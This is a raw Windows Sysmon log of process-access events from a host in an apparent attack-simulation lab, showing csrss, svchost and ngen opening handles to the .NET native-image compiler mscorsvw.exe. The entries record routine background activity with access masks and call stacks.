13:50:01.463{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9209-6005-7E03-00000000A301}4732C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007828Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:01.463{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9209-6005-7E03-00000000A301}4732C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000007827Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:01.400{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9209-6005-7D03-00000000A301}864C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007826Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:01.385{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9209-6005-7D03-00000000A301}864C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007825Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:01.385{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9209-6005-7D03-00000000A301}864C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007824Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:01.104{59A5CD1D-8E46-6005-0D00-00000000A301}6284704C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-0C00-00000000A301}596C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007823Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:01.104{59A5CD1D-8E46-6005-0D00-00000000A301}6284704C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-0F00-00000000A301}1116C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007822Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:01.104{59A5CD1D-8E46-6005-0D00-00000000A301}6284704C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007821Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:01.057{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9209-6005-7C03-00000000A301}3224C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007820Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:01.041{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9209-6005-7C03-00000000A301}3224C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007819Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:01.041{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9209-6005-7C03-00000000A301}3224C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007818Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:00.994{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9208-6005-7B03-00000000A301}1188C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007861Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:02.963{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-920A-6005-8803-00000000A301}4436C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007860Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:02.947{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-920A-6005-8803-00000000A301}4436C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007859Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:02.947{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-920A-6005-8803-00000000A301}4436C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007858Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:02.869{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-920A-6005-8703-00000000A301}2128C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007857Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:02.854{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-920A-6005-8703-00000000A301}2128C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007856Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:02.854{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-920A-6005-8703-00000000A301}2128C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007855Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:02.822{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-920A-6005-8603-00000000A301}4708C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007854Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:02.807{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-920A-6005-8603-00000000A301}4708C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007853Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:02.807{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-920A-6005-8603-00000000A301}4708C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007852Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:02.760{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-920A-6005-8503-00000000A301}4136C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007851Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:02.744{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-920A-6005-8503-00000000A301}4136C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007850Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:02.744{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-920A-6005-8503-00000000A301}4136C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007849Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 